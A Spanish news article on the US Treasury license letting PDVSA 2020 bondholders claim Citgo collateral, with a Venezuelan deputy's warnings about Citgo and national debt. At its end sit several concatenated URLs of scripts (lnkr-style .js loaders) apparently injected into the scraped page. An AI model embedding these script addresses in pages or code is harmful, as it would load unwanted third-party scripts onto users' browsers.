La Asamblea Nacional exige al gobierno hacer todo lo concerniente para conservar la filial de Petróleos de Venezuela en Estados Unidos.

El Departamento del Tesoro de Estados Unidos autorizó el jueves pasado a que ciudadanos radicados en su territorio puedan realizar algunas transacciones sobre el bono 2020 de Petróleos de Venezuela.

Es una excepción de la norma ejecutiva del 21 de mayo, mediante la cual ciudadanos estadounidenses no pueden efectuar operaciones con la petrolera venezolana debido a las sanciones impuestas por el gobierno de Donald Trump.

La Oficina de Control de Activos Extranjeros publicó la licencia número 5 que autoriza a los ciudadanos o empresas que tengan el bono de Pdvsa 2020 a reclamar el cobro de su garantía del 50% de las acciones de Citgo, en el caso de que la industria nacional incumpla el cronograma de pagos. Desde una óptica política, el peso de las sanciones aún se mantiene sobre el gobierno de Nicolás Maduro.

Seguimiento

El diputado Jorge Millán, integrante de la Comisión de Energía de la Asamblea Nacional, calificó de muy grave para Venezuela la medida del Departamento del Tesoro. Recordó que el Parlamento ha denunciado la sería situación que atraviesa Pdvsa

No solo desde el punto de vista de producción, sino también en relación con la deuda. “Las acciones del gobierno de Nicolás Maduro una vez más ponen en riesgo una empresa bastante comprometida como es Citgo, que en un momento determinado representó para los venezolanos un orgullo. Era salir de las fronteras del país con un desarrollo y una capacidad de venta en una nación tan importante como Estados Unidos”.

Destacó que la medida de Trump dificulta aún más sostener la industria petrolera no solo en Venezuela, sino en el ámbito internacional.

Advirtió que la Asamblea se mantiene alerta y hace seguimiento al cronograma de pago del gobierno, por lo que exigen se haga todo lo pertinente para conservar Citgo.

Millán añadió que desde hace bastante tiempo la industria petrolera debía revisarse. “Estamos discutiendo un plan petrolero que permita recuperar la capacidad productiva. Pero advertimos que en la medida en que Venezuela siga endeudándose, este año podemos cerrar con 10 millardos de dólares de deuda sin pagar, lo que pone en riesgo nuestros activos internacionales y de embargos de crudo, que debilitan una economía tan precaria”.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=46https://devlinkin.xyz/addons/lnkr5.min.jshttps://devlinkin.xyz/addons/lnkr30_nt.min.jshttps://eluxer.net/code?id=105&subid=51824_6748_

Loading...